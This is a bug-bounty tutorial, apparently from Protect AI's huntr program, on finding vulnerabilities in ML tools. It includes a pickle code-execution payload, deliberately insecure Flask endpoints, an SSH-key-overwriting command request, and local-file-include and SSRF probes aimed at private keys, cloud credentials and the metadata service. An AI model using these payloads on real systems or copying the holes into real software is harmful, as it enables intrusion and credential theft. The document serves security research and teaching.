Introduction
Bug Hunting in AI/ML Tools
The brave new world of machine learning (ML) comes with promises of speed, accuracy, and efficiency in nearly every task. What it doesn't come with is promises of security. We intend to supercharge security in this promising field with the release of an incentivized public program to crowdsource the discovery and elimination of vulnerabilities in the core tools. What many don't realize, however, is that whether it's traditional software security or ML security, the hunt for vulnerabilities remains the same. The exception is generative AI such as ChatGPT or Stable Diffusion, which does have its own unique security issues. In our research we have found those issues to be significantly less practical for real-world attacks, so we will focus on the more pressing need: security in the ML supply chain.
Major Skill Sets:
1. Web Security
   - Specialty: Identifying common vulnerabilities in web applications and APIs, such as the OWASP Top Ten.
   - Arsenal: Web application attack proxies such as BurpSuite or ZAP for discovery, plus the knowledge to leverage the vulnerabilities found for maximum impact.
2. Code Review
   - Specialty: Reading source code with an eye for the common functions and patterns that are incorrectly implemented.
   - Arsenal: Static code analyzers and the knowledge to interpret and test their findings.
3. Exploit Development
   - Specialty: Reading lower-level language code such as C/C++ to find bugs in object and memory handling that could result in exploitation.
   - Arsenal: Proficiency with fuzzers such as libFuzzer to test areas of the code for potential vulnerabilities by exploring as many code paths as possible.
Exploit development generally requires more background knowledge, practice, and time spent hunting than the other skills, so we will focus this introduction on web and code security.
Web/API Security
ML projects live and die by API calls. A person can both create and use an ML model entirely from their local disk, but the value and efficiency of the project is multiplied by sharing the model and its predictions with multiple users. This is where Machine Learning Operations (MLOps) tools and inference servers come in. MLOps tools are designed to be a place to store and experiment with models and often come with a web application for easier usage. Inference servers allow a user to send a request to the model and receive the model's predictions in return via API calls. These web applications and APIs can be vulnerable to all the traditional web security attacks, like cross-site scripting, local file includes, and privilege escalation.
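For a concrete sense of what an inference API call looks like, here is a minimal sketch assuming a model served locally by MLflow (`mlflow models serve -p 5001`); the endpoint and payload shape vary by server and version.

```python
import requests

# Send a prediction request to a locally served MLflow model. The
# /invocations endpoint and dataframe_split payload are MLflow conventions;
# other inference servers use their own routes and formats.
response = requests.post(
    "http://127.0.0.1:5001/invocations",
    json={"dataframe_split": {"columns": ["sqft", "bedrooms"], "data": [[1500, 3]]}},
    timeout=10,
)
print(response.json())  # the model's predictions
```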
The Basics
For traditional bug bounty hunters, web and API security skills will transfer 1:1 into the ML bug bounty field for tools that include a web UI or API. Examples include MLflow, Airflow, and H2O-3. For those looking to learn the basics, the following resources are excellent places to start.
Intros to web security research:
- PortSwigger academy: https://portswigger.net/web-security
- OWASP Web Security Testing Guide: https://owasp.org/www-project-web-security-testing-guide/v42/
- HackTricks Web Testing Guide: https://book.hacktricks.xyz/pentesting-web/web-vulnerabilities-methodology
Vulnerable practice environments:
- HackTheBox web challenges: https://hackthebox.com/
- Google Gruyere: https://google-gruyere.appspot.com/
- OWASP Juice Shop: https://owasp.org/www-project-juice-shop/
Security writeups:
- Awesome Bug Bounty Writeups: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
- Pentesterland: https://pentester.land/writeups/
- Infosec Writeups: https://infosecwriteups.com/tagged/bug-bounty
- MLSecOps: https://mlsecops.com/ai-ml-hacking-resources
After you've gained some background knowledge on web security research, your time is best spent absorbing as many bug bounty reports as possible, as they'll give you the most realistic tips and tricks for acquiring valid findings.
From Web/API to ML
Search each library with a bounty on https://huntr.com for any kind of web or API server. For example, MLflow has a built-in web UI. Download the project, set up an intercepting proxy such as BurpSuite, then explore the functionality of the web application or API to populate BurpSuite with requests, as in the sketch below. Now begin testing for vulnerabilities, both manually and with the built-in automated scanner.
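As a minimal sketch of that workflow, the snippet below drives requests through Burp's default listener so they land in the proxy history; the MLflow port and the page requested are illustrative, and clicking around the UI in a proxied browser accomplishes the same thing.

```python
import requests

# Route traffic through BurpSuite's default listener (127.0.0.1:8080) so
# every request shows up in the proxy history for replay and scanning.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# Fetch the MLflow UI root (default port 5000) to seed the proxy history.
resp = requests.get("http://127.0.0.1:5000/", proxies=proxies, timeout=10)
print(resp.status_code)
```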
The majority of the libraries currently in the Inference and MLOps sections of the huntr bounties contain HTTP or API components. The Data Science and ML Frameworks sections are largely more established, more secure libraries, which means more time per vulnerability found; the tradeoff is that vulnerabilities in those libraries are extremely impactful given the widespread, cross-domain usage of most of them. Our recommendation is that beginners focus first on the MLOps and Inference categories and move into the Data Science and ML Frameworks libraries after gaining some experience. Some exceptions to this rule of thumb exist, such as H2O-3, which is a great target for researchers.
What Should I Look For?
Protect AI researchers have found a multitude of vulnerabilities in these tools, and certain patterns have appeared in our research. Three classes of high-severity vulnerability keep appearing: excessive access to the server's filesystem, server-side request forgery, and remote code execution.
FAP, SSRF and RCEs
The prime example of file access permissions gone wrong is the MLflow local file include vulnerability written about here. Server-side request forgery was found in the comparable tool Kubeflow, as written about here. Remote code execution has been found in some libraries as well, but those findings are currently pending verification.
Compared to traditional web applications, which commonly deal with simple image or document uploads and little else, ML tools must do a lot of work with local and remote files. Data and models are both files that need the flexibility to live in various places in the local or remote filesystem, and ML libraries need read and write access to them to do their work. The problem arises when developers opt for convenience over security. It is more convenient for both developer and user if the ML library places very few restrictions on read/write access to the filesystem the tool is run on. There is no standard place for models and data to live in a filesystem, so many ML library developers have taken this to mean that complete access to the filesystem is good for users.
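A hypothetical sketch of this pattern (the route and parameter names are invented): a "convenient" artifact endpoint that trusts whatever path the client supplies.

```python
from flask import Flask, request, send_file

app = Flask(__name__)

# Convenience over security: the endpoint serves any path the client names,
# so every file the server process can read is exposed over HTTP.
@app.route("/api/get-artifact")
def get_artifact():
    path = request.args.get("path", "")
    return send_file(path)  # no allowlist, no base-directory check

# A safer version would resolve the path with os.path.realpath() and reject
# anything that escapes a dedicated artifact root.
```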
Second, remote code execution is easy to introduce accidentally. Many ML libraries start as programmatic interfaces that require some programming skill to use. This keeps nontechnical folks from using the library, so a web UI is added for a point-and-click interface rather than a programmatic one. The problem is that this UI often exposes remote API calls to a programmatic interface which may not have been developed with remote access in mind. That means a remote user might be able to send an API request through the web UI and gain arbitrary code execution on the remote server. Additionally, model files themselves are highly susceptible to code injection; see https://protectai.com/blog/announcing-modelscan. If the web UI allows the remote upload of model files and then runs them, there's a high chance of remote code execution.
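To see why model uploads are so dangerous, here is a minimal, self-contained demonstration of code execution via Python's pickle format, the serialization underlying many model file formats:

```python
import os
import pickle

# pickle's __reduce__ hook lets a "model" run an arbitrary command the
# moment it is deserialized: loading the file IS executing attacker code.
class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("id",))  # any shell command works here

payload = pickle.dumps(MaliciousModel())
pickle.loads(payload)  # prints the output of `id`: code ran on load
```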
Static Code Analysis
If you're looking for the most likely vulnerable targets before you dive in deep, static code analysis is an excellent use of your time for target acquisition. Simply download the GitHub repository, load the directory in your IDE of choice, such as PyCharm or VSCode, install the free Snyk plugin in the IDE, and scan the library with Snyk. The project with the most Snyk findings is likely the softest target for a quick vulnerability and payout through huntr.
The majority of findings in Snyk are likely to be false positives, but it's worth going through them one by one to verify. Path Traversal has been the most common finding we've seen in Snyk, racking up hundreds of hits in the libraries we've tested. 99% of the time it's a false positive because the traversal requires access to the programmatic interface, and if you have access to the programmatic interface or to local utility scripts in the project directory, you already have access to the filesystem. However, we've seen a strong correlation between the number of Snyk Path Traversal findings and valid File Include vulnerabilities in APIs and web interfaces.
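A sketch of that distinction, with hypothetical function and route names: a static analyzer flags both call sites as Path Traversal, but only the one reachable over HTTP is a valid finding.

```python
import os
from flask import Flask, request

app = Flask(__name__)

def load_dataset(path: str) -> str:
    # The sink a static analyzer flags as Path Traversal.
    with open(path) as f:
        return f.read()

def export_report(name: str) -> str:
    # False positive: only callable from local scripts, and a local caller
    # already has filesystem access.
    return load_dataset(os.path.join("reports", name))

@app.route("/api/dataset")
def get_dataset():
    # Valid finding: the same sink fed by a remote HTTP parameter.
    return load_dataset(request.args.get("path", ""))
```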
A Far Too Realistic Scenario
A user is trying to predict housing prices in a location. They have a CSV file of housing prices over the past 10 years, but some of the data is not in a form a model can read: a house's price might be a string instead of an integer, and the model needs that column to be numeric in order to make predictions based on it. An ML library called SuperFastML was recently released that automatically cleans the CSV dataset and creates a prediction model with it.
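As a sketch of that cleaning step (the data here is invented), coercing a string price column into numbers might look like:

```python
import pandas as pd

# Coerce string prices like "$350,000" into numbers; unparseable rows
# become NaN and can be dropped or imputed before training.
df = pd.DataFrame({"price": ["$350,000", "420000", "n/a"]})
df["price"] = pd.to_numeric(
    df["price"].str.replace(r"[$,]", "", regex=True), errors="coerce"
)
print(df)
```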
SuperFastML stands up a web UI application to make this process as easy as possible for the user. The user downloads the library, starts the server, then goes to Firefox and visits their local IP address and port that the UI started up on, let’s say that is http://192.168.1.9:12345. The user then clicks a big Upload button, uploads their CSV file, the library cleans it, then trains a model using the data. The user then inspects their cleaned CSV file in the UI to make sure it looks right and saves it for later. The user navigates to the newly created model in the UI and uploads other CSVs of housing data so the model can make predictions on future housing prices.
Super convenient! In 5 minutes, a user that knows not a blessed thing about AI gets results that would’ve taken a highly educated engineer months of effort only a few years ago. Unfortunately, things have gone horribly, horribly wrong. Let’s take a look at the most likely places critical vulnerabilities can exist in this library.
The Web UI Application
The web UI starts on http://192.168.1.9:12345. Can you spot the problem? 192.168.1.9 is a network-exposed address. Other computers on the local network, such as other Wi-Fi users or other employees in your department, can also visit SuperFastML's web UI hosted on your computer. This means any vulnerability in the web server is exploitable by a malicious user on the network, or by a hacker who phished or exploited their way into it, say via a stolen VPN password. Furthermore, SuperFastML's developers assumed that since the server is stood up locally by a user, there was no need for authentication. This may be surprising, but in our experience with web UIs in ML tools, authentication is the exception, not the rule. As a result, not only are vulnerabilities remotely exploitable, but all your data and models are exposed to anyone who scans the network with a tool like nmap or WitnessMe.
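In Flask terms (assuming, hypothetically, that's what SuperFastML uses), the difference is one argument:

```python
from flask import Flask

app = Flask(__name__)

# Binding to 0.0.0.0 or a LAN address exposes every endpoint to the whole
# network; binding to loopback keeps the UI on this machine only.
# app.run(host="0.0.0.0", port=12345)   # reachable by anyone on the network
app.run(host="127.0.0.1", port=12345)   # reachable only locally
```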
What if SuperFastML only allowed itself to be hosted on 127.0.0.1? This is the local loopback interface, which is only accessible to users logged into the server SuperFastML is hosted on. Problem solved, right? Not quite. SuperFastML expects that it will only be accessible to local users, and as such provides an API endpoint which can execute code, since local users already have code execution permissions anyway. Other "silly" security protections such as Cross-Site Request Forgery tokens don't matter for the same reason; it's just local users on a local application, right? Eh… no.
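A hypothetical sketch of such an endpoint: no authentication, no CSRF token, and a side effect triggered by a plain GET, all justified by "it's local-only."

```python
import subprocess
from flask import Flask, request

app = Flask(__name__)

# "Local users can already run code, so why protect this?" No auth, no CSRF
# token, and command execution reachable by a simple GET request.
@app.route("/api/RunCommand")
def run_command():
    cmd = request.args.get("cmd", "")
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

app.run(host="127.0.0.1", port=12345)
```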
A malicious user hosts some custom JavaScript on a server they own that makes an XHR request to the command execution endpoint and asks it to overwrite a user's private SSH key: http://127.0.0.1:12345/api/RunCommand?cmd="echo '-----BEGIN OPENSSH PRIVATE KEY-----[...]' > /home/danmcinerney/.ssh/id_rsa". This link is sent to a user of SuperFastML. Surely CORS will stop this, because the malicious site is making a request to a different domain, right? Eh… no again. There's something called a Simple Request: a GET, POST, or HEAD request that uses only a limited set of safelisted headers. Simple Requests do not trigger the preflight CORS check that would stop this attack. Instead, the end user of SuperFastML clicks the malicious link and bam, their private SSH key is overwritten by the attacker's key and the attacker can now log in to the server remotely.
File Upload and Viewing
For starters, data files can have many different extensions. For convenience, many (most?) ML libraries, SuperFastML included, will allow any type of file extension to be uploaded. If the application is written in Java, then a .jsp backdoor can be uploaded and used for remote code execution. Models are even harder to filter, as their file extensions are completely arbitrary; to filter models properly, the file data itself needs to be inspected. Given the glut of model file formats, this is a herculean task that is simply skipped by most ML libraries. System allows the upload of the commonly used pickle format? Remote code execution. Upload of raw code models? Remote code execution. Check the README here for more information: https://github.com/protectai/modelscan
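A sketch of why extension filtering alone falls short (the allowlist here is hypothetical): it blocks the .jsp backdoor, yet several "allowed" model formats are pickle-based and execute code the moment they are loaded.

```python
import os

# A naive upload filter: blocks obvious web backdoors but happily accepts
# pickle-based model formats, which are themselves code execution on load.
ALLOWED_EXTENSIONS = {".csv", ".json", ".pkl", ".pt", ".h5"}

def extension_allowed(filename: str) -> bool:
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS

print(extension_allowed("backdoor.jsp"))  # False: blocked
print(extension_allowed("model.pkl"))     # True: still RCE when deserialized
```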
Second, powerful Local File Include vulnerabilities live in this area as well. As we mentioned before, a pattern in ML libraries is allowing the user far too much access to the local filesystem, and that includes reading files. Like many other ML libraries, SuperFastML lets the user specify which directory to store data and models in. An attacker selects /home/danmcinerney/.ssh/ as the location they'd like to store models and data, then simply makes a request to view a certain "data file" named id_rsa, and what do you know: the attacker can now log into the server SuperFastML is hosted on as the user danmcinerney. Most ML applications at least attempt to filter out LFI attacks, but as we saw in MLflow, it's not uncommon for these protections to be bypassable. To find this in SuperFastML, you, the intrepid security researcher, simply search all the requests you made to the service with a regex that matches file paths: ^(\/[^\/\0]+)+\/?$. Voila! LFI with high potential for remote code execution through private cloud keys such as /home/danmcinerney/.aws/credentials or /home/danmcinerney/.ssh/id_rsa.
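A small sketch of that triage step, applying the regex from the text to captured parameter values (the sample values stand in for a real proxy export):

```python
import re

# The path-matching regex from the text: flags absolute file paths in
# parameter values, which are prime candidates for LFI tampering.
PATH_RE = re.compile(r"^(\/[^\/\0]+)+\/?$")

captured_params = [
    "/home/danmcinerney/models",
    "housing.csv",
    "/home/danmcinerney/.ssh/id_rsa",
]
for value in captured_params:
    if PATH_RE.match(value):
        print("path-like parameter worth tampering with:", value)
```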
In the same vein, Server-Side Request Forgery (SSRF) is even more common. SuperFastML wants the user to be able to upload data from S3 buckets and other remote servers, because this is convenient! Searching for strings such as "http://", "ftp://", "s3://", "file=", "filename=", or a regex like \b[a-zA-Z][a-zA-Z0-9+.-]*:\/\/\S+ in all the requests you made to SuperFastML is likely to turn up several locations where you can force SuperFastML to make a request and return the response directly to you. You can use this for several practical attacks: a denial-of-service attack against an external target that comes directly from SuperFastML, pointing the request at a site hosting an XSS payload and sending the link to another user, or querying sensitive internal locations such as the cloud metadata service at http://169.254.169.254/user-data/ or internal IP addresses like the router configuration page.
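As a hypothetical probe against this scenario (the endpoint and parameter names are invented), pointing such a server-side fetch at the cloud metadata service looks like:

```python
import requests

# If the import endpoint fetches a user-supplied URL server-side, aiming it
# at the cloud metadata service may leak instance credentials back to us.
resp = requests.post(
    "http://192.168.1.9:12345/api/import",
    json={"data_url": "http://169.254.169.254/latest/meta-data/"},
    timeout=10,
)
print(resp.status_code, resp.text[:300])
```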
Conclusion
AI/ML libraries are still chock full of juicy low-hanging fruit due to the speed of development and the desire for user convenience in the ML industry. We've incentivized the discovery of these vulnerabilities on https://huntr.com with lucrative payouts to help raise the bar for security in the industry as fast as possible. Note that none of the research or statements here denigrate the great work ML library developers have done, often completely unpaid. They generally do not come from professional web development backgrounds and may not have the requisite knowledge to stop, or even recognize, the most common attacks. The state of AI/ML security is simply how every emerging technology starts off: remote login protocols like telnet in the 70s, remote messaging protocols like SMB in the 80s, websites in the 90s, mobile applications in the 00s. It takes time to dial in the security implications of emerging technologies, and our job as researchers is to speed that process up!